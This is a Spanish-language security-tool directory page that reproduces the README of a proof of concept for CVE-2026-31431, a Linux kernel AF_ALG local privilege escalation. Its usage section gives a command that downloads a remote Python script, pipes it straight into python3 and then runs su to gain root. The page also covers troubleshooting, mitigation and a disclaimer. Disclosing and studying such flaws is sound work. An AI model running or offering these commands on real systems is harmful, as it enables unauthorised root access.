Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-31431 — Prueba de concepto educativa que demuestra la escalada local de privilegios en el kernel de Linux mediante AF_ALG algif_aead (CVE-2026-31431). Incluye instrucciones de uso y orientación de mitigación para investigación defensiva. | Kitploit
Herramientas/GitHubGitHub/ademzero/cve-2026-31431
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónAprendizaje y Educación
GitHubademzero/cve-2026-31431

CVE-2026-31431

Prueba de concepto educativa que demuestra la escalada local de privilegios en el kernel de Linux mediante AF_ALG algif_aead (CVE-2026-31431). Incluye instrucciones de uso y orientación de mitigación para investigación defensiva.

Ver Repositorio
hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-31431 - PoC de Copy Fail

Prueba de concepto educativa para CVE-2026-31431, también conocida como Copy Fail, una vulnerabilidad de escalada de privilegios local en el kernel de Linux que involucra la interfaz criptográfica AF_ALG / algif_aead.

[!WARNING] Este repositorio se proporciona estrictamente con fines educativos, defensivos y de investigación de seguridad autorizada únicamente.

No ejecute este código en sistemas que no le pertenezcan o en sistemas donde no tenga permiso escrito explícito para realizar pruebas.

El uso no autorizado puede ser ilegal.


Descripción general

CVE-2026-31431 es una vulnerabilidad de escalada de privilegios local en el kernel de Linux que afecta al subsistema criptográfico del kernel.

La vulnerabilidad involucra la ruta AEAD expuesta a través de la interfaz AF_ALG y puede permitir que un usuario local sin privilegios interfiera con los datos de la caché de páginas asociados con archivos legibles, lo que potencialmente podría conducir a una escalada de privilegios en sistemas vulnerables.

Este repositorio contiene una prueba de concepto educativa mínima destinada a entornos de laboratorio controlados.


Requisitos

El sistema objetivo debe exponer el algoritmo AEAD AF_ALG requerido.

Puede verificarlo con:

root@kitploit:~
grep -i "authencesn\|authenc" /proc/crypto

El PoC espera soporte para un algoritmo similar a:

root@kitploit:~
authencesn(hmac(sha256),cbc(aes))

Si el algoritmo no está disponible, el PoC puede fallar con un error como:

root@kitploit:~
FileNotFoundError: [Errno 2] No such file or directory

Esto significa que el algoritmo criptográfico requerido del kernel no está disponible en el sistema.


Uso

Clone el repositorio:

root@kitploit:~
git clone https://github.com/Karim33z/CVE-2026-31431.git
cd CVE-2026-31431

Ejecute el PoC:

root@kitploit:~
python3 poc.py

O ejecútelo directamente:

root@kitploit:~
curl -s https://raw.githubusercontent.com/Karim33z/CVE-2026-31431/refs/heads/main/poc.py | python3 && su

Notas de compatibilidad

Algunos sistemas Linux usan /bin/su en lugar de /usr/bin/su. Puede verificar la ruta correcta con:

root@kitploit:~
which su

Si es necesario, ajuste la ruta de destino dentro de poc.py.


Solución de problemas

Algoritmo AEAD faltante

Si obtiene FileNotFoundError: [Errno 2] No such file or directory al vincularse a authencesn(hmac(sha256),cbc(aes)), entonces el algoritmo requerido del kernel no está disponible.

Verifique los algoritmos criptográficos disponibles:

root@kitploit:~
cat /proc/crypto

o más específicamente:

root@kitploit:~
grep -i "authencesn\|authenc\|cbc(aes)\|sha256" /proc/crypto

Ruta de su incorrecta

Si el PoC hace referencia a /usr/bin/su pero su sistema usa /bin/su, verifique con:

root@kitploit:~
which su

Luego actualice la ruta en poc.py en consecuencia.


Mitigación

Los defensores deben actualizar a una versión parcheada del kernel de Linux proporcionada por el proveedor de su distribución.

Después de actualizar el kernel, reinicie el sistema para asegurarse de que el kernel parcheado esté activo.

Las mitigaciones temporales pueden incluir restringir el acceso a la funcionalidad criptográfica afectada del kernel según el entorno y la distribución.


Aviso legal

Este proyecto está destinado únicamente a:

  • Investigación de seguridad
  • Validación defensiva
  • Fines educativos
  • Pruebas de laboratorio autorizadas

El autor no es responsable del mal uso, daños o actividad ilegal causada por este código.

Úselo únicamente en sistemas donde tenga autorización explícita.


Licencia

Este proyecto está licenciado bajo la Licencia MIT.

Descargar herramienta